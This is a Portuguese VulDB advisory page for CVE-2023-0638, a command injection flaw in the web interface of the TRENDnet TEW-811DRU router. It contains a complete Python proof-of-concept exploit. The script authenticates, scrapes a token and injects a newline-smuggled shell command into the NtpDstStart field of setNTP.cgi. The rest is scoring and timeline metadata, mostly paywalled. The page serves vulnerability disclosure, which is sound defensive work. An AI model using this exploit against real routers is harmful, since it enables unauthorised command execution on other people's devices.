TRENDnet TEW-811DRU 1.0.10.0 Web Interface direitos alargados

CVSS Meta Temp scorePreço de exploração actual (≈)Nota de Interesse CTI
6.5$0-$5k0.04

Uma vulnerabilidade foi encontrada em TRENDnet TEW-811DRU 1.0.10.0. Foi classificada como crítico. Afectado é uma função desconhecida do componente Web Interface. A manipulação com uma entrada desconhecida leva a direitos alargados. Usar a CWE para declarar o problema leva à CWE-77.

A vulnerabilidade é identificada como CVE-2023-0638. O ataque pode ser feito a partir da rede. Não há detalhes técnicos disponíveis. A vulnerabilidade não é bem conhecida. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada. Esta vulnerabilidade é atribuída a T1202 pelo projecto MITRE ATT&CK.

É declarado como proof-of-concept. É possível descarregar a exploração em vuldb.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k. O código utilizado pela exploração é:

import requests,socket
import re
import time
from urllib.parse import urlencode


username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'


request = {'HEAD': 
{'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Content-Length': '555', 
'Origin': 'http://0.0.0.0:8081', 
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/adm/time.asp', 
'Cookie': 'expandable=5c', 
'Upgrade-Insecure-Requests': '1'}, 
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 
'DSTenable': 'on',
'NtpDstEnable': 1, 
'NtpDstOffset': -7200, 
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 
'tz_daylight_start_day_select': 1, 
'tz_daylight_start_time_select': 2, 
'NtpDstEnd': 100102, 
'tz_daylight_end_month_select': 384968387, 
'tz_daylight_end_day_select': 1, 
'tz_daylight_end_time_select': 2, 
'enableNTP': 1, 
'ntp_server': 1, 
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11', 
'timer_interval': 16776915, 
'manual_year_select': 2012, 
'manual_month_select': 'abcd', 
'manual_day_select': 'abcd', 
'manual_min_select': -38, 
'manual_sec_select': "abcd", 
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../', 
'DNSServerGuest': ''}, 
'ATTR': 
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 
'METHOD': 'POST', 
'VERSION': 'HTTP/1.1'}
}


headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']


login_header = {'Host': '0.0.0.0:8081', 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': '/', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/login.asp', 
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
  try:
    loop -= 1
    r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
    if r.status_code != 200:
      continue
    r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
    pat = r'name="token" value="(.*?)"'
    token_value = re.findall(pat,r.text)
    if len(token_value)>0:
      params['token'] = token_value[0]
      print('new_token:{}'.format(token_value[0]))
      break
  except Exception as e:
    time.sleep((3-loop)*3)
    print('error:{}'.format(e))



try:
  r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
  pass

Produtoinformação

Fabricante

Nome

Versão

Licença

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 7.2
VulDB Meta Temp score: 6.5

VulDB Pontuação Base: 7.2
VulDB Pontuação da Tempestade: 6.5
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação da Tempestade: 🔍
VulDB Fiabilidade: 🔍

Exploraçãoinformação

Classe: Direitos alargados
CWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202

Local: Não
Remoto: Sim

Disponibilidade: 🔍
Aceda a: Público
Estado: Proof-of-Concept
Linguagem de programação: 🔍
Descarregar: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Tendência dos preços: 🔍
Estimativa de preço actual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Inteligência de Ameaçasinformação

Interesse: 🔍
Actores Activos: 🔍
Grupos APT activos: 🔍

Contra-medidasinformação

Recomendação: nenhuma medida conhecida
Estado: 🔍

Tempo 0-Dia: 🔍

Linha do tempoinformação

02/02/2023 🔍
02/02/2023 +0 Dias 🔍
02/02/2023 +0 Dias 🔍
01/03/2023 +27 Dias 🔍

Fontesinformação

Estado: Não definido

CVE: CVE-2023-0638 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

Entradainformação

Criado em: 02/02/2023 09h09
Actualizado em: 01/03/2023 16h39
Ajustamentos: 02/02/2023 09h09 (38), 02/02/2023 09h10 (2), 01/03/2023 16h39 (2)
Completo: 🔍
Submeter: leetsun

Submitinformação

Aceite

  • Submit #76135: Command injection vulnerability in TRENDnet router TEW-811DRU (a partir de leetsun)

Discussão

Ainda sem comentários. Idiomas: pt + en.

Por favor inicie sessão para comentar.

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!